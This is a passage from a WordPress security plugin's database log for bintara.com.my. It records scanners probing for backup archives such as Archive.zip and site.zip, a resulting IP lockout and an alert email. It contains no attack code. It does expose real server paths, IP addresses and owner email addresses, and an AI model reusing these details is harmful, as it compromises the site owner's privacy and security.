17:45:46',35126376,36928360,'http://bintara.com.my/new/Archive.zip',1,0,'182.50.132.111'),(27156,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp2/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/wp2/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp2/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46logAAAQU\";s:12:\"REDIRECT_URL\";s:16:\"/wp2/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37462\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/wp2/Archive.zip\";s:10:\"SCRIPT_URL\";s:16:\"/wp2/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46logAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606344.3058\";s:12:\"REQUEST_TIME\";s:10:\"1569606344\";}}','notice','2019-09-27 17:45:55','2019-09-27 17:45:46',35124024,36925736,'http://bintara.com.my/wp2/Archive.zip',1,0,'182.50.132.111'),(27157,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/2018/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/2018/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/2018/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lqgAAAQI\";s:12:\"REDIRECT_URL\";s:17:\"/2018/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37490\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/2018/Archive.zip\";s:10:\"SCRIPT_URL\";s:17:\"/2018/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwpB8LtYU@MYZI46lqgAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606344.3157\";s:12:\"REQUEST_TIME\";s:10:\"1569606344\";}}','notice','2019-09-27 17:45:55','2019-09-27 17:45:46',35124640,36929768,'http://bintara.com.my/2018/Archive.zip',1,0,'182.50.132.111'),(27158,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/news/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/news/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/news/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXIQAAAUs\";s:12:\"REDIRECT_URL\";s:17:\"/news/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37454\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/news/Archive.zip\";s:10:\"SCRIPT_URL\";s:17:\"/news/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXIQAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606344.3234\";s:12:\"REQUEST_TIME\";s:10:\"1569606344\";}}','notice','2019-09-27 17:45:55','2019-09-27 17:45:46',35124440,36933568,'http://bintara.com.my/news/Archive.zip',1,0,'182.50.132.111'),(27159,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/1/Archive.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/1/Archive.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/1/Archive.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXIgAAAU8\";s:12:\"REDIRECT_URL\";s:14:\"/1/Archive.zip\";s:11:\"REMOTE_ADDR\";s:14:\"182.50.132.111\";s:11:\"REMOTE_PORT\";s:5:\"37468\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/1/Archive.zip\";s:10:\"SCRIPT_URL\";s:14:\"/1/Archive.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5KwnKlfXTtZ68oOVBXIgAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606344.3169\";s:12:\"REQUEST_TIME\";s:10:\"1569606344\";}}','notice','2019-09-27 17:45:55','2019-09-27 17:45:46',35125088,36930488,'http://bintara.com.my/1/Archive.zip',1,0,'182.50.132.111'),(27160,0,'lockout','host-lockout::182.50.132.111','a:13:{s:6:\"module\";s:12:\"four_oh_four\";s:4:\"host\";s:14:\"182.50.132.111\";s:7:\"user_id\";b:0;s:8:\"username\";b:0;s:14:\"module_details\";a:4:{s:4:\"type\";s:12:\"four_oh_four\";s:6:\"reason\";s:54:\"too many attempts to access a file that does not exist\";s:4:\"host\";i:20;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:12:\"four_oh_four\";s:13:\"lockout_start\";s:19:\"2019-09-28 01:45:46\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-27 17:45:46\";s:14:\"lockout_expire\";s:19:\"2019-10-02 05:45:46\";s:18:\"lockout_expire_gmt\";s:19:\"2019-10-01 21:45:46\";s:12:\"lockout_host\";s:14:\"182.50.132.111\";}','action','2019-09-27 17:45:55','2019-09-27 17:45:46',35207888,36930488,'http://bintara.com.my/1/Archive.zip',1,0,'182.50.132.111'),(27161,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-27 17:45:56','2019-09-27 17:45:46',35569656,36930488,'http://bintara.com.my/1/Archive.zip',1,0,'182.50.132.111'),(27162,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/new/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/new/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/new/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BThwAAAI4\";s:12:\"REDIRECT_URL\";s:13:\"/new/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52590\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/new/site.zip\";s:10:\"SCRIPT_URL\";s:13:\"/new/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BThwAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.5101\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35520408,37325080,'http://bintara.com.my/new/site.zip',1,0,'103.133.215.103'),(27163,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/1/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/1/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/1/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LIpB8LtYU@MYZI46ltgAAAQc\";s:12:\"REDIRECT_URL\";s:11:\"/1/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52583\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/1/site.zip\";s:10:\"SCRIPT_URL\";s:11:\"/1/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LIpB8LtYU@MYZI46ltgAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.1167\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35518984,37315616,'http://bintara.com.my/1/site.zip',1,0,'103.133.215.103'),(27164,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/staging/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/staging/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/staging/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTiQAAAIA\";s:12:\"REDIRECT_URL\";s:17:\"/staging/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52585\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/staging/site.zip\";s:10:\"SCRIPT_URL\";s:17:\"/staging/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTiQAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.4342\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35520136,37322504,'http://bintara.com.my/staging/site.zip',1,0,'103.133.215.103'),(27165,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/portal/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/portal/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/portal/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LInKlfXTtZ68oOVBXNAAAAU4\";s:12:\"REDIRECT_URL\";s:16:\"/portal/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52595\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/portal/site.zip\";s:10:\"SCRIPT_URL\";s:16:\"/portal/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LInKlfXTtZ68oOVBXNAAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.4706\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35517648,37322296,'http://bintara.com.my/portal/site.zip',1,0,'103.133.215.103'),(27166,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/www/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/www/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/www/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BThgAAAIg\";s:12:\"REDIRECT_URL\";s:13:\"/www/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52588\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/www/site.zip\";s:10:\"SCRIPT_URL\";s:13:\"/www/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BThgAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.5059\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35517024,37319800,'http://bintara.com.my/www/site.zip',1,0,'103.133.215.103'),(27167,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/dev/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 